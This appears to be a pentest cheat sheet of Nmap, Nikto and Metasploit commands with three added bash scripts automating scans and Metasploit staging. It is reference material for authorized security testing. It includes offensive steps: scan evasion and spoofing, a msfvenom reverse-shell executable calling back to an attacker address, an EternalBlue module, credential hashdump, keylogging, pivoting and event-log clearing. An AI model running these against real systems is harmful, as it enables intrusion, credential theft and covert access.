// security testing reference — pro edition
PENTEST CHEAT SHEET
Comprehensive command reference for network recon, web vulnerability scanning and exploitation.
Covers Nmap, Nikto and Metasploit.
// Nmap
// Host Discovery
Ping Sweep
nmap -sn <network/cidr>
Find all live hosts without port scanning
Skip Host Discovery
nmap -Pn <target>
Treat all hosts as up — scan even if no ping response
ARP Scan (LAN)
nmap -PR -sn <network/cidr>
Fast and reliable host discovery on local network
TCP SYN Ping
nmap -PS22,80,443 <target>
Discover hosts via SYN packets to specific ports
UDP Ping
nmap -PU53,161 <target>
Discover hosts via UDP — useful when ICMP is blocked
List Scan (No Scan)
nmap -sL <network/cidr>
List targets and do reverse DNS — no actual scanning
// Port Scanning
Default Scan (Top 1000)
nmap <target>
Scan top 1000 ports — fast default
All 65535 Ports
nmap -p- <target>
Full port sweep — slow but thorough
Specific Ports
nmap -p 22,80,443,3306,8080 <target>
Scan only specified ports
Port Range
nmap -p 1-1024 <target>
Scan a range of ports
Top N Ports
nmap --top-ports 100 <target>
Scan the N most commonly used ports
SYN Scan (Stealth)
nmap -sS <target>
Half-open scan (requires root; the default when run as root): no handshake completes, so the application never sees a connection, but every IDS still sees the SYNs. "Stealth" only in that narrow sense
TCP Connect Scan
nmap -sT <target>
Full TCP handshake — works without root, more detectable
UDP Scan
nmap -sU <target>
UDP scan (slow): finds DNS (53), SNMP (161), DHCP (67). Ports that never answer show as open|filtered, so add -sV to confirm the interesting ones
TCP + UDP Combined
nmap -sS -sU -p T:80,U:53 <target>
Scan both TCP and UDP in one run
FIN / NULL / Xmas Scans
nmap -sF <target>   (or -sN, -sX)
Exploit RFC 793 behaviour (closed ports answer RST, open ports stay silent) to slip past stateless filters. Only meaningful against RFC-compliant stacks: Windows and many network devices reply RST on every port, so everything shows as closed
// Detection & Fingerprinting
Service Version Detection
nmap -sV <target>
Detect service names and versions on open ports
OS Detection
nmap -O <target>
Identify the OS via TCP/IP stack fingerprinting (requires root); works best when the target has at least one open and one closed TCP port
Aggressive Scan
nmap -A <target>
Same as -O -sV -sC --traceroute in one flag: noisy and slow, but a reasonable first pass against a single host
Version Intensity Max
nmap -sV --version-intensity 9 <target>
Max probe level for version detection (0-9)
Traceroute
nmap --traceroute <target>
Map network path to the target
Aggressive OS Guess
nmap -O --osscan-guess <target>
Print nmap's closest OS match even when the fingerprint is not a confident hit (--fuzzy is the same option)
// NSE Scripts
Default Scripts
nmap -sC <target>
Run default safe NSE scripts
Vulnerability Scan
nmap --script vuln <target>
Run all vulnerability detection scripts
Safe Scripts Only
nmap --script safe <target>
Non-intrusive information gathering
HTTP Enumeration
nmap --script http-enum -p 80,443 <target>
Enumerate web directories and common paths
HTTP Methods
nmap --script http-methods -p 80,443 <target>
Show allowed HTTP methods (PUT, DELETE etc.)
HTTP Title
nmap --script http-title -p 80,443,8080 <target>
Get page titles from web services
SMB Vulnerabilities
nmap --script "smb-vuln*" -p 445 <target>
Run every smb-vuln-* script (MS17-010/EternalBlue, MS08-067 and others); quote the wildcard so the shell does not expand it against local files
SMB Shares
nmap --script smb-enum-shares -p 445 <target>
List accessible SMB file shares
Banner Grabbing
nmap --script banner <target>
Grab service banners from all open ports
FTP Anonymous Login
nmap --script ftp-anon -p 21 <target>
Check if FTP allows anonymous access
SSH Auth Methods
nmap --script ssh-auth-methods -p 22 <target>
List accepted SSH authentication methods
DNS Brute Force
nmap --script dns-brute <domain>
Guess subdomains from a built-in wordlist; the argument is a domain name, not an IP
SSL Certificate Info
nmap --script ssl-cert -p 443 <target>
Get SSL certificate details and expiry
Heartbleed Check
nmap --script ssl-heartbleed -p 443 <target>
Test for CVE-2014-0160 Heartbleed vulnerability
MySQL Info
nmap --script mysql-info -p 3306 <target>
Get MySQL server info and capabilities
RDP Info
nmap --script rdp-ntlm-info,rdp-enum-encryption -p 3389 <target>
Hostname, domain and OS build from the NTLM handshake plus the supported security layers; note that rdp-screenshot is not one of Nmap's bundled scripts
// Evasion & Firewall Bypass
Fragment Packets
nmap -f <target>
Split probes into 8-byte IP fragments (-ff for 16) to confuse naive packet filters; needs raw sockets, and modern IDS and stateful firewalls reassemble before inspecting
Decoy Scan
nmap -D RND:5 <target>
Mix your probes with 5 random decoy source addresses; your real address is still one of the senders, and decoys that are not actually up can leave the target SYN-flooded
Spoof Source IP
nmap -S <spoof-ip> -e eth0 -Pn <target>
Forge the source address: replies go to the spoofed host, so you learn nothing unless you can sniff that path. -e names the sending interface and -Pn is needed because ping-based discovery cannot work
Randomize Hosts
nmap --randomize-hosts <network/cidr>
Scan hosts in random order to avoid detection patterns
Bad Checksum
nmap --badsum <target>
Send probes with a bad TCP/UDP checksum: real hosts silently drop them, so any reply comes from a firewall or IDS that does not validate checksums
Source Port Spoof
nmap --source-port 53 <target>
Use port 53 (DNS) as source — bypasses some firewalls
// Output & Reporting
Normal Output
nmap <target> -oN scan.txt
Save human-readable output to file
XML Output
nmap <target> -oX scan.xml
Save as XML — importable into Metasploit
Grepable Output
nmap <target> -oG scan.gnmap
Save in grep-friendly format for parsing
All Formats
nmap <target> -oA results
Save .nmap, .xml and .gnmap simultaneously
Verbose
nmap -v / -vv <target>
Show results as they arrive (-vv = more detail)
Reason for State
nmap --reason <target>
Show why nmap classified each port as open/closed
// Speed & Timing Reference
-T0 Paranoid: extremely slow, one probe every 5 minutes, serialised; maximum IDS evasion
-T1 Sneaky: very slow, one probe every 15 seconds, serialised; some IDS evasion
-T2 Polite: slower, about 0.4 s between probes; reduces bandwidth and load on the target
-T3 Normal: default timing, balanced speed and accuracy
-T4 Aggressive: fast; assumes a reliable, low-latency network
-T5 Insane: very fast; may miss results on slow or lossy networks
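Added example (not part of the original cheat sheet) that ties the port-scanning, output and timing entries together: a two-stage scan that sweeps all 65535 ports quickly, parses the grepable output for what was actually open, and runs version and script detection only against those ports. Assumes bash, awk, sort, paste and nmap; the .gnmap lines embedded below are constructed sample data, not a real scan, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Two-stage scan: a fast full-port sweep to find what is open, then
# version/script detection only on those ports. Added example, not from
# the page. Assumes bash, awk, sort, paste and nmap; the .gnmap text
# below is constructed sample data, not a real scan.

# Pull a sorted, de-duplicated, comma-separated list of open TCP ports out
# of grepable (-oG) output. Port entries look like 22/open/tcp//ssh///.
open_ports_from_gnmap() {
  awk -F'Ports: ' '/Ports:/ {
      n = split($2, entry, ", ")
      for (i = 1; i <= n; i++) {
        split(entry[i], f, "/")          # f[1]=port f[2]=state f[3]=proto
        if (f[2] == "open" && f[3] == "tcp") print f[1]
      }
    }' "$1" | sort -nu | paste -s -d ',' -
}

# Stage 1: all 65535 TCP ports, no probes, only open ports in the output.
# Stage 2: -sV -sC restricted to the ports stage 1 found, saved in all formats.
two_stage_scan() {
  target="$1"
  prefix="${2:-scan}"
  nmap -p- -T4 --open -oG "${prefix}-sweep.gnmap" "$target" >/dev/null
  ports="$(open_ports_from_gnmap "${prefix}-sweep.gnmap")"
  if [ -z "$ports" ]; then
    echo "no open TCP ports on $target" >&2
    return 1
  fi
  nmap -sV -sC -p "$ports" -oA "${prefix}-detail" "$target"
}

# Constructed sample of what stage 1 writes (two hosts, one filtered port).
SAMPLE_GNMAP="$(mktemp)"
{
  printf '# Nmap 7.94 scan initiated (constructed sample)\n'
  printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
  printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 443/open/tcp//https///\tIgnored State: closed (65531)\n'
  printf 'Host: 10.0.0.6 ()\tPorts: 80/open/tcp//http///, 8080/open/tcp//http-proxy///\n'
  printf '# Nmap done (constructed sample)\n'
} > "$SAMPLE_GNMAP"

echo "ports to rescan: $(open_ports_from_gnmap "$SAMPLE_GNMAP")"   # 22,80,443,8080

# Real run: ./two_stage.sh --scan <target> [prefix]
if [ "${1:-}" = "--scan" ] && [ -n "${2:-}" ]; then
  two_stage_scan "$2" "${3:-scan}"
fi
```

The filtered port (135) is dropped by the state check and the duplicate port 80 appears once, so the second pass spends its version probes only where they can return something; -oA in stage 2 gives the XML that Metasploit's db_import consumes later.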
// Nikto
// Basic Scans
Basic Web Scan
nikto -h <target>
Scan web server on port 80 for common vulnerabilities
HTTPS Scan
nikto -h <target> -ssl
Force SSL/HTTPS scan on port 443
Custom Port
nikto -h <target> -p 8080
Scan web server on non-standard port
HTTPS Custom Port
nikto -h <target> -ssl -p 8443
HTTPS scan on non-standard port
Scan Multiple Ports
nikto -h <target> -p 80,443,8080,8443
Scan multiple web ports in one run
Scan via URL
nikto -h https://<target>/path/
Scan starting from a specific URL path
// Authentication
Basic Auth
nikto -h <target> -id user:pass
Scan with HTTP basic authentication
Cookie Auth
nikto -h <target> -Option "STATIC-COOKIE=session=abc123"
Send a fixed cookie with every request for authenticated scanning. There is no -cookies flag: the value is the STATIC-COOKIE setting from nikto.conf, overridden here with -Option (see nikto.conf for the exact multi-cookie format)
Custom User-Agent
nikto -h <target> -Option "USERAGENT=Mozilla/5.0"
Override the User-Agent from nikto.conf (-useragent is not a Nikto flag); the default string announces Nikto by name and version
// Evasion & Advanced
Through Burp Proxy
nikto -h <target> -useproxy http://127.0.0.1:8080
Route traffic through Burp Suite for inspection
Evasion Mode 1
nikto -h <target> -evasion 1
Random URI encoding — bypass basic WAF/IDS
Evasion Mode 2
nikto -h <target> -evasion 2
Directory self-reference (/./) insertion
Disable SSL
nikto -h <target> -nossl
Force plain HTTP on the port; this switches SSL off entirely and has nothing to do with certificate verification
Disable DNS Lookups
nikto -h <target> -nolookup
Skip reverse DNS lookups (the flag is -nolookup; there is no -nodns)
Pause Between Tests
nikto -h <target> -Pause 2
Wait 2 seconds between tests; reduces the chance of tripping rate limits or overloading a fragile host
Timeout Setting
nikto -h <target> -timeout 10
Set request timeout in seconds
Update Plugins
nikto -update
Update Nikto plugins and databases
// Specific Tuning
XSS Only
nikto -h <target> -Tuning 4
Test for XSS and script injection only
SQL Injection Only
nikto -h <target> -Tuning 9
Test for SQL injection vulnerabilities only
Info Disclosure + Misconfig
nikto -h <target> -Tuning 23
Categories are given as one string with no separators: 2 (misconfiguration/default files) plus 3 (information disclosure), not "2,3"
Everything Except DoS
nikto -h <target> -Tuning x6
x inverts the selection: run all categories except those listed, here 6 (denial of service). With no -Tuning at all Nikto already runs every test
// Output
Save as HTML
nikto -h <target> -o report.html -Format htm
Save full scan results as HTML report
Save as Text
nikto -h <target> -o report.txt
Save results as plain text
Save as CSV
nikto -h <target> -o report.csv -Format csv
Export to CSV for spreadsheet import
Save as XML
nikto -h <target> -o report.xml -Format xml
Save as XML for tool integration
// Tuning Reference
-Tuning 0  File Upload
-Tuning 1  Interesting files / seen in logs
-Tuning 2  Misconfiguration / default files
-Tuning 3  Information Disclosure
-Tuning 4  Injection (XSS / Script / HTML)
-Tuning 5  Remote File Retrieval (inside web root)
-Tuning 6  Denial of Service
-Tuning 7  Remote File Retrieval (server-wide)
-Tuning 8  Command Execution / Remote Shell
-Tuning 9  SQL Injection
-Tuning a  Authentication Bypass
-Tuning b  Software Identification
-Tuning c  Remote Source Inclusion
-Tuning d  WebService
-Tuning e  Administrative Console
-Tuning x  Reverse tuning: run everything except the listed categories (e.g. x6)
Combine categories by concatenation (-Tuning 23), never with commas.
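Added example, not from the original page, for the Nikto sections above: discover the usual web ports with Nmap, hand the grepable output to Nikto on stdin (its documented multi-host mode, "nikto -h -"), and validate the -Tuning string first, since the tuning format is a bare string of category characters and a separator such as a comma is not a category. Assumes bash, nmap and nikto on PATH; the function names are this example's own.

```shell
#!/usr/bin/env bash
# Feed Nmap's web-port discovery straight into Nikto and reject a malformed
# -Tuning string before a long scan starts. Added example, not from the
# page. Assumes bash, nmap and nikto on PATH; "nikto -h -" reading nmap -oG
# output from stdin is Nikto's documented multi-host mode.

# -Tuning is a bare string of category characters (0-9, a-e) with no
# separators; a leading x inverts it ("everything except these").
valid_tuning() {
  case "$1" in
    x[0-9a-e]*) rest="${1#x}" ;;   # reverse tuning needs at least one category
    [0-9a-e]*)  rest="$1" ;;
    *)          return 1 ;;        # empty, bare "x", or starts with junk
  esac
  case "$rest" in
    *[!0-9a-e]*) return 1 ;;       # commas, spaces, unknown categories
  esac
  return 0
}

# Scan the usual web ports on a range, keep only hosts with something open,
# and let Nikto walk the resulting host/port list with the requested tuning.
nikto_from_nmap() {
  range="$1"
  tuning="${2:-x6}"                # everything except denial-of-service tests
  report="${3:-nikto-report.html}"
  if ! valid_tuning "$tuning"; then
    echo "bad -Tuning '$tuning': use e.g. 23 or x6 (no commas)" >&2
    return 2
  fi
  nmap -p 80,443,8080,8443 --open -oG - "$range" \
    | nikto -h - -Tuning "$tuning" -Format htm -o "$report"
}

# Real run: ./nikto_sweep.sh --run <network/cidr> [tuning] [report.html]
if [ "${1:-}" = "--run" ] && [ -n "${2:-}" ]; then
  nikto_from_nmap "$2" "${3:-x6}" "${4:-nikto-report.html}"
fi
```

Because --open is set, hosts with nothing listening never reach Nikto, and the x6 default keeps the denial-of-service category out of a scan against anything you are not allowed to knock over.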
// Metasploit
// Starting Up
Launch Console
msfconsole
Start the Metasploit Framework interactive console
Launch Quiet
msfconsole -q
Start without ASCII art banner — cleaner output
Init Database
msfdb init
Initialize PostgreSQL database for Metasploit
DB Status
db_status
Check if database is connected inside msfconsole
Import Nmap XML
db_import scan.xml
Import nmap XML scan results into the database
Show Hosts from DB
hosts
List all hosts discovered and stored in the database
Show Services from DB
services
List all services detected from imported scans
// Search & Navigation
Search by Name
search eternalblue
Find modules by name, platform or author
Search by CVE
search cve:2017-0144
Find modules by CVE number
Search by Platform
search platform:windows type:exploit
Filter by OS platform and module type
Use Module
use exploit/windows/smb/ms17_010_eternalblue
Select a module — can also use the result number from search
Module Info
info
Full details about current module — targets, CVEs, refs
Go Back
back
Deselect current module, return to main console
// Configuration
Show Options
show options
List all required and optional parameters
Show Advanced Options
show advanced
List advanced/hidden configuration options
Set Target Host
set RHOSTS <target>
Set remote host(s) — accepts IP, range, or CIDR
Set Target Port
set RPORT 445
Set the remote port to attack
Set Local Host
set LHOST <your-ip>
Your IP address for reverse shell callbacks
Set Local Port
set LPORT 4444
Local port to listen on for incoming connections
Show Payloads
show payloads
List compatible payloads for current module
Set Payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Choose the payload to deliver on exploitation
Unset Option
unset RHOSTS
Clear a configured option
Set Global Option
setg LHOST <your-ip>
Set option globally — persists across modules
// Execution
Check Vulnerability
check
Test whether the target looks vulnerable without firing the exploit; not every module implements check, and a negative result is not proof of safety
Run / Exploit
run
Execute the current module (alias: exploit)
Run as Background Job
run -j
Run module in background — keep console free
List Jobs
jobs
Show all running background jobs
Kill Job
kill 0
Terminate a background job by ID
// Sessions
List Sessions
sessions -l
Show all active sessions
Interact with Session
sessions -i 1
Connect to session by ID number
Background Session
background
Send current session to background
Kill Session
sessions -k 1
Terminate a session by ID
Upgrade to Meterpreter
sessions -u 1
Upgrade a basic shell session to Meterpreter
Run Module on Session
sessions -s post/module
Run a post-exploitation module on all sessions
// Meterpreter
System Info
sysinfo
Get OS, hostname and architecture of target
Current User
getuid
Show which user the session is running as
Get Shell
shell
Drop into a native OS command shell
List Processes
ps
Show all running processes on target
Migrate Process
migrate <PID>
Move Meterpreter into another process, typically a long-lived one such as explorer.exe, so the session survives if the original host process exits; this buys stability, not persistence across reboots
Privilege Escalation
getsystem
Try the built-in techniques (named-pipe impersonation and token duplication) to become SYSTEM. Windows only; on current Windows it needs an already-elevated or SeImpersonate-capable context, otherwise a local exploit module is required
Dump Password Hashes
hashdump
Extract local account hashes from the SAM (Windows); needs SYSTEM, so run getsystem or migrate into a SYSTEM process first
Download File
download /path/to/file
Download file from target to your machine
Upload File
upload localfile /remote/path
Upload file from your machine to target
Screenshot
screenshot
Capture screenshot of target's desktop
Keylogger Start
keyscan_start
Start capturing keystrokes on target
Keylogger Dump
keyscan_dump
Display captured keystrokes
Network Interfaces
ipconfig
Show network interfaces of target machine
ARP Table
arp
Show ARP table — reveals other hosts on local network
Port Forward
portfwd add -l 8080 -p 80 -r <internal-host>
Listen on local port 8080 and relay to port 80 on <internal-host>, routed through the compromised machine; one way to pivot into a network you cannot reach directly
Clear Event Logs
clearev
Clear the Windows Application, System and Security logs. Clearing the Security log itself writes event 1102 (and 104 for System), which is a standard detection, so this rarely hides anything from a monitored host
// Auxiliary Modules
TCP Port Scanner
use auxiliary/scanner/portscan/tcp
Built-in TCP port scanner
SMB Version Scan
use auxiliary/scanner/smb/smb_version
Detect SMB version on target hosts
SMB Login Check
use auxiliary/scanner/smb/smb_login
Brute force or test SMB credentials
SSH Login Brute
use auxiliary/scanner/ssh/ssh_login
Brute force SSH credentials
FTP Login Brute
use auxiliary/scanner/ftp/ftp_login
Brute force FTP credentials
HTTP Version
use auxiliary/scanner/http/http_version
Identify web server type and version
HTTP Directory Brute
use auxiliary/scanner/http/dir_scanner
Brute force web directories and paths
MySQL Login
use auxiliary/scanner/mysql/mysql_login
Brute force MySQL credentials
DNS Enumeration
use auxiliary/gather/dns_enum
Enumerate DNS records for a domain
SNMP Sweep
use auxiliary/scanner/snmp/snmp_enum
Enumerate SNMP information from devices
// Listeners & Handlers
Multi Handler
use exploit/multi/handler
Generic listener — catch reverse shells and payloads
Generate Payload (msfvenom)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
Generate standalone executable payload
List Payload Formats
msfvenom --list formats
Show all output formats: exe, elf, php, py, raw, etc.
List Encoders
msfvenom --list encoders
Show available encoders (e.g. x86/shikata_ga_nai); they exist to avoid bad characters in exploit buffers and do little against current AV/EDR, which recognise the decoder stub
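Added example, not from the original page, covering the Starting Up, Auxiliary Modules and Listeners & Handlers sections in one workflow: import an Nmap XML file, let the database choose RHOSTS for a scanner module, and generate a payload together with the handler that catches it from one set of values. Assumes msfconsole and msfvenom on PATH with the database initialised (msfdb init); scan.xml is whatever "nmap -oX" wrote, 10.0.0.1 is a placeholder attacker address, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Metasploit driven from the shell: import Nmap results, let the database
# choose RHOSTS for a scanner module, and stage a payload together with the
# handler that catches it from one set of values. Added example, not from
# the page. Assumes msfconsole/msfvenom on PATH with the database
# initialised (msfdb init); scan.xml is whatever "nmap -oX" wrote and
# 10.0.0.1 is a placeholder attacker address.
PAYLOAD="windows/x64/meterpreter/reverse_tcp"
LHOST="10.0.0.1"
LPORT="4444"

# Resource script for recon: "services -p 445 -u -R" sets RHOSTS from hosts
# with an up SMB service in the database, so the scanner follows imported
# data rather than a hand-typed range.
recon_rc() {
  cat <<EOF
workspace -a ${2:-engagement}
db_import $1
services -p 445 -u -R
use auxiliary/scanner/smb/smb_version
set THREADS 10
run
services -p 445 -u
EOF
}

# Resource script for the listener: same PAYLOAD/LHOST/LPORT as msfvenom
# (a mismatch is the usual reason a callback never arrives). ExitOnSession
# false keeps the handler up after the first session, -j backgrounds it,
# -z skips auto-interaction so several callbacks can be collected.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# LPORT must be a number in 1-65535; refuse anything else before msfvenom runs.
check_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Write both scripts, build the payload, start the console with both.
stage_engagement() {
  xml="$1"
  check_port "$LPORT" || { echo "bad LPORT: $LPORT" >&2; return 2; }
  recon_rc "$xml" engagement > recon.rc
  handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > handler.rc
  msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f exe -o shell.exe
  cat recon.rc handler.rc > engagement.rc
  msfconsole -q -r engagement.rc
}

# Real run: ./msf_stage.sh --run scan.xml
if [ "${1:-}" = "--run" ] && [ -n "${2:-}" ]; then
  stage_engagement "$2"
fi
```

The point of generating handler.rc from the same three variables as the msfvenom call is that a staged payload only works when the handler is set to the identical payload string; keeping both in one script removes the most common cause of a listener that never sees its session.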